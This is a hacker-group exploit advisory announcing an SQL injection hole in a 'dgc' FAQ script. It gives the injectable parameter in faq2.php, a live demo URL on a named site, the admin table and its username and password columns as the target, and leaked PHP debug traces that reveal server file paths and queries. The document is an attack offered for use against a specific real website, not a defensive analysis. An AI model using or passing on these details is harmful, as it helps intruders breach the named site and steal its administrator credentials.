|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
|* ______ ____ __ __ |
|* /\__ _\/\ _`\ /\ \/\ \ |
|* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } |
|* \ \ \ \ \ _ <'\ \ _ \ |
|* \ \ \ \ \ \L\ \\ \ \ \ \ |
|* \ \_\ \ \____/ \ \_\ \_\ |
|* \/_/ \/___/ \/_/\/_/ |
|* |
|* I'm Wolf Long live wolf |
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
=======================================================================
\* [Title] :[dgc sql injection vulnerability] /*
\* [Author] :[skote_vahshat] /*
\* [Home] :[Http://turk-bh.ir] /*
\* [Email] :[skote.vahshat@Gmail.Com] /*
=======================================================================
/* Web Server ==>> [ Apache/2.0.55 (Ubuntu) PHP/4.4.2-1build1 ]
/* Powered-by ==>> [ PHP/4.4.2-1build1 ]
/* DB Server ==>> [ MySQL ]
/*
/* [+]Exploit :
/* http://www.target.com/faq2.php?id=[SQLi]
/* [+]Demo:
/* http://www.dgc.ca/faq2.php?language=0&id=173&faqid=573
/* [+] Tble admin:
/* bs_availability_user
/*
/* [+]column name:
/* username pass
/*
/* [+]ErroR injection:
/*
/*
/*/-----------------------
/*
/* SELECT * FROM faq WHERE id = 573
<?php
= array (
0 =>
array (
'file' => '/mnt/alpha/dgc.ca/include/faq.php',
'line' => 26,
'function' => 'querydb',
'class' => 'faq',
'type' => '->',
'args' =>
array (
0 => 'SELECT * FROM faq WHERE id = 573\\\'',
),
),
1 =>
array (
'file' => '/mnt/alpha/dgc.ca/include/faq.php',
'line' => 20,
'function' => 'load',
'class' => 'faq',
'type' => '->',
'args' =>
array (
),
),
2 =>
array (
'file' => '/mnt/alpha/dgc.ca/faq2.php',
'line' => 150,
'function' => 'faq',
'class' => 'faq',
'type' => '->',
'args' =>
array (
0 => '573\\\'',
),
),
);
?>
/*
// QUERY: SELECT id FROM faq WHERE parent_id = 573\' ORDER BY display_order
<?php
= array (
0 =>
array (
'file' => '/mnt/alpha/dgc.ca/include/faq.php',
'line' => 201,
'function' => 'querydb',
'class' => 'faq',
'type' => '->',
'args' =>
array (
0 => 'SELECT id FROM faq WHERE parent_id = 573\\\' ORDER BY display_order',
),
),
1 =>
array (
'file' => '/mnt/alpha/dgc.ca/faq2.php',
'line' => 151,
'function' => 'get_children_ids',
'class' => 'faq',
'type' => '->',
'args' =>
array (
),
),
);
?>
=======================================================================
|_***_| spical thanks : bl4ck.viper ,dr.tofan , nafsh, netqurd |
|_***_| tbh team , cyberwh team , all turkiS hackers|
=======================================================================